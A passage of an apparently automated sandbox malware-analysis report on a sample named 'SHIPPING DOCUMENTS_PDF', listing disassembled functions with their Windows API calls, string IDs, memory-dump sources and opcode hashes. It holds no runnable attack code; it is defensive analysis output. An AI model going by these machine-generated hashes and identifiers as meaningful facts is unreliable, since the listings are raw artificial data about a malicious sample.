                                                                                    • Instruction ID: 3dee1b787c799db79a7ba2e9c1b675e3a956179ba104286d07b894d610e369ad
                                                                                    • Opcode Fuzzy Hash: 26e574041c224a572c6329ad1ef1bce2e20974300111ae9fda117d8ca0132fe5
                                                                                    • Instruction Fuzzy Hash: A0618D7090024AAFDF21CF64DC98EFEBBF8EB45308F144599E842A7251DBB1AD05DB21
                                                                                    Function 00BD6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BD6FA5
                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BD6FA8
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BD6FCC
                                                                                    • _memset.LIBCMT ref: 00BD6FDD
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BD6FEF
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BD7067
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 830647256-0
                                                                                    • Opcode ID: 7c7372fcf05e9bf527e53ef85c13a35cbff45e7217b15288fd3b7cd6432e3ded
                                                                                    • Instruction ID: c7d36b6eb51e5c8602c5d572ff233c49ce0c7f4089db78496b41c8131c1dd829
                                                                                    • Opcode Fuzzy Hash: 7c7372fcf05e9bf527e53ef85c13a35cbff45e7217b15288fd3b7cd6432e3ded
                                                                                    • Instruction Fuzzy Hash: 86616D75940208AFDB11DFA4CC81FEEB7F8EB49710F14419AFA14AB3A1E771A941DB90
                                                                                    Function 00BA6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BA6BBF
                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00BA6C18
                                                                                    • VariantInit.OLEAUT32(?), ref: 00BA6C2A
                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BA6C4A
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00BA6C9D
                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BA6CB1
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BA6CC6
                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00BA6CD3
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA6CDC
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BA6CEE
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA6CF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                    • String ID:
                                                                                    • API String ID: 2706829360-0
                                                                                    • Opcode ID: 69342fb6e0559363ffd8d9aeba560d0b8c016d6b11b7efb9eb333501a39add19
                                                                                    • Instruction ID: 4b845bba5bad86115ddc61230d6f8a5b29c64b39d8dde6f097707dfd42d868d8
                                                                                    • Opcode Fuzzy Hash: 69342fb6e0559363ffd8d9aeba560d0b8c016d6b11b7efb9eb333501a39add19
                                                                                    • Instruction Fuzzy Hash: 37413F75A04219EFCF00DF68D8549AEBBF9EF09354F0480A9E956E7361DB30A945CFA0
                                                                                    Function 00BC5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00BC5793
                                                                                    • inet_addr.WSOCK32(?), ref: 00BC57D8
                                                                                    • gethostbyname.WSOCK32(?), ref: 00BC57E4
                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00BC57F2
                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC5862
                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC5878
                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BC58ED
                                                                                    • WSACleanup.WSOCK32 ref: 00BC58F3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                    • String ID: Ping
                                                                                    • API String ID: 1028309954-2246546115
                                                                                    • Opcode ID: 8ad1f899d4ec4b355ce97e98f412b08406a5795473eb6b670fe234adac699448
                                                                                    • Instruction ID: 4c1018e77bf952599008184b5cad816df8191ce769f7bf3280969b9c4e38f2d5
                                                                                    • Opcode Fuzzy Hash: 8ad1f899d4ec4b355ce97e98f412b08406a5795473eb6b670fe234adac699448
                                                                                    • Instruction Fuzzy Hash: 46516F316047019FDB209F24DC95F6AB7E4EF48710F0485AAF996DB2A1DB70E844DB51
                                                                                    Function 00BBB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00BBB4D0
                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BBB546
                                                                                    • GetLastError.KERNEL32 ref: 00BBB550
                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00BBB5BD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                    • API String ID: 4194297153-14809454
                                                                                    • Opcode ID: d074e9469bd606d8de1ae7e189e94c49f4686ae2c89f39edad8918e03d6b3626
                                                                                    • Instruction ID: 2efe9442d699f94626e00bcf5335622845079d8dc4c51f322de4c7b04731d85c
                                                                                    • Opcode Fuzzy Hash: d074e9469bd606d8de1ae7e189e94c49f4686ae2c89f39edad8918e03d6b3626
                                                                                    • Instruction Fuzzy Hash: 1E316F75A00209DBCB20EB68CCA5FFDB7F4EF14311F1441A6E90597291DBF09A45CB52
                                                                                    Function 00BA8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00BA9014
                                                                                    • GetDlgCtrlID.USER32 ref: 00BA901F
                                                                                    • GetParent.USER32 ref: 00BA903B
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA903E
                                                                                    • GetDlgCtrlID.USER32(?), ref: 00BA9047
                                                                                    • GetParent.USER32(?), ref: 00BA9063
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BA9066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1536045017-1403004172
                                                                                    • Opcode ID: a4a7d33a70852cdf8035cae2d123a7da2dafb4417518743916348b7d971a6f31
                                                                                    • Instruction ID: 74143a514924df24d5b739906977eca92bd739069cda8c36cac6b25accbe0439
                                                                                    • Opcode Fuzzy Hash: a4a7d33a70852cdf8035cae2d123a7da2dafb4417518743916348b7d971a6f31
                                                                                    • Instruction Fuzzy Hash: E9210870A04105BFDF15ABA0CC95EFEB7B4EF49310F0041A6B912972F1DF359818DA20
                                                                                    Function 00BA907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00BA90FD
                                                                                    • GetDlgCtrlID.USER32 ref: 00BA9108
                                                                                    • GetParent.USER32 ref: 00BA9124
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA9127
                                                                                    • GetDlgCtrlID.USER32(?), ref: 00BA9130
                                                                                    • GetParent.USER32(?), ref: 00BA914C
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BA914F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1536045017-1403004172
                                                                                    • Opcode ID: fc43b043c74145cf4fe59d0f2e9dc1bd224ee59abdaa2b0b034ecabe648589b4
                                                                                    • Instruction ID: d1240ed463ae7a76c0257a659d7c53319cc12bdd524e845f26391371c5fbffc7
                                                                                    • Opcode Fuzzy Hash: fc43b043c74145cf4fe59d0f2e9dc1bd224ee59abdaa2b0b034ecabe648589b4
                                                                                    • Instruction Fuzzy Hash: 1E21F574A04109BBDF15ABA0CC95EFEBBF4EF49300F0041A6B911A72E1EB759819DB20
                                                                                    Function 00BA9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32 ref: 00BA916F
                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00BA9184
                                                                                    • _wcscmp.LIBCMT ref: 00BA9196
                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00BA9211
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                    • API String ID: 1704125052-3381328864
                                                                                    • Opcode ID: 5e23098a190ade5b5651a4b969f08a5c6dda5fdf708aeb65aaba0ee57ab45e73
                                                                                    • Instruction ID: b8e42bb1a85ca20b1b51664281d1897e1ded1e9cbe8bdc0f1732197871014d32
                                                                                    • Opcode Fuzzy Hash: 5e23098a190ade5b5651a4b969f08a5c6dda5fdf708aeb65aaba0ee57ab45e73
                                                                                    • Instruction Fuzzy Hash: 8111593664C307BAFA182624EC0BEB777DCDB12720B2001A7F914E14D1FE616C51A990
                                                                                    Function 00BC88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 00BC88D7
                                                                                    • CoInitialize.OLE32(00000000), ref: 00BC8904
                                                                                    • CoUninitialize.OLE32 ref: 00BC890E
                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00BC8A0E
                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BC8B3B
                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00BE2C0C), ref: 00BC8B6F
                                                                                    • CoGetObject.OLE32(?,00000000,00BE2C0C,?), ref: 00BC8B92
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00BC8BA5
                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BC8C25
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BC8C35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 2395222682-0
                                                                                    • Opcode ID: 03d4d04608a4e3b792f560b81a594bcb1c2f594bf17a6f14106b24810b1c02a7
                                                                                    • Instruction ID: 0c9f5600a5026fb0333dcc300edae783c04e64e71ba1fddc3c76e671b864786e
                                                                                    • Opcode Fuzzy Hash: 03d4d04608a4e3b792f560b81a594bcb1c2f594bf17a6f14106b24810b1c02a7
                                                                                    • Instruction Fuzzy Hash: 89C1F2B1608305AFD700DF64C884E2AB7E9EF89748F04499DF98A9B261DB71ED05CB52
                                                                                    Function 00BB7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00BB7A6C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafeVartype
                                                                                    • String ID:
                                                                                    • API String ID: 1725837607-0
                                                                                    • Opcode ID: 6f8dac1ee76836daf31f04329476d0a29a59cf18045f37615c166eb083d7efec
                                                                                    • Instruction ID: 09be4dc35d9350e02e55fd3475957bd547748a19fd82967d936e305294226c9f
                                                                                    • Opcode Fuzzy Hash: 6f8dac1ee76836daf31f04329476d0a29a59cf18045f37615c166eb083d7efec
                                                                                    • Instruction Fuzzy Hash: 2AB1927194821A9FDB10DFA4C894BFEBBF4EF89321F1044A9E551E7241DBB4E941CB90
                                                                                    Function 00BB11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00BB11F0
                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB1204
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00BB120B
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB121A
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BB122C
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB1245
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB1257
                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB129C
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB12B1
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB12BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                    • String ID:
                                                                                    • API String ID: 2156557900-0
                                                                                    • Opcode ID: c03344ea1f07c75ce711543bad430eaafe745a24385353480339a5ce08e494f8
                                                                                    • Instruction ID: ef80ba4c2349f00546b82b7861a3d70ca6b43112ac3ea5dcb6d210233b3febc0
                                                                                    • Opcode Fuzzy Hash: c03344ea1f07c75ce711543bad430eaafe745a24385353480339a5ce08e494f8
                                                                                    • Instruction Fuzzy Hash: DC319F75601204ABDB109F98EC94BFE77EAEB56311F5085A9F901D71A0D7B0DD40CB50
                                                                                    Function 00B8BDA2 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 00B52231
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 00B5223B
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00B52250
                                                                                    • GetStockObject.GDI32(00000005), ref: 00B52258
                                                                                    • GetClientRect.USER32(?), ref: 00B8BDBB
                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B8BDD2
                                                                                    • GetWindowDC.USER32(?), ref: 00B8BDDE
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00B8BDED
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00B8BDFF
                                                                                    • GetSysColor.USER32(00000005), ref: 00B8BE1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3430376129-0
                                                                                    • Opcode ID: 01cd01664681a00edc0de85a51c803894dfabfeab68690c79daab447bfef0be5
                                                                                    • Instruction ID: 8945631c196d43bb83fe96592d18119992b193d38729a20cf4c256fd207be4d0
                                                                                    • Opcode Fuzzy Hash: 01cd01664681a00edc0de85a51c803894dfabfeab68690c79daab447bfef0be5
                                                                                    • Instruction Fuzzy Hash: 0A215C32506206EFDB216FA4EC58BE9BBA1EB15322F1042A6FA26960F1DB314951DF11
                                                                                    Function 00B5FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B5FAA6
                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00B5FB45
                                                                                    • UnregisterHotKey.USER32(?), ref: 00B5FC9C
                                                                                    • DestroyWindow.USER32(?), ref: 00B945D6
                                                                                    • FreeLibrary.KERNEL32(?), ref: 00B9463B
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B94668
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                    • String ID: close all
                                                                                    • API String ID: 469580280-3243417748
                                                                                    • Opcode ID: 69566bc8b4e42e27a2a8bc5070257c88355de994c47272b74cdda93d3f6bb79e
                                                                                    • Instruction ID: c7d8b311f7cfc0b7370d8016466974a411a450a9a78f152c33658022478b1595
                                                                                    • Opcode Fuzzy Hash: 69566bc8b4e42e27a2a8bc5070257c88355de994c47272b74cdda93d3f6bb79e
                                                                                    • Instruction Fuzzy Hash: BDA11370602212CFCB29EB14C9A5B79F7E4EF05711F5542F9E90AAB261DB30AD1ACF50
                                                                                    Function 00BAA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumChildWindows.USER32(?,00BAA439), ref: 00BAA377
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ChildEnumWindows
                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                    • API String ID: 3555792229-1603158881
                                                                                    • Opcode ID: e2c1f807580717a533ac62cc256e895f2048550d140a489f4fd58c5c6318e6d6
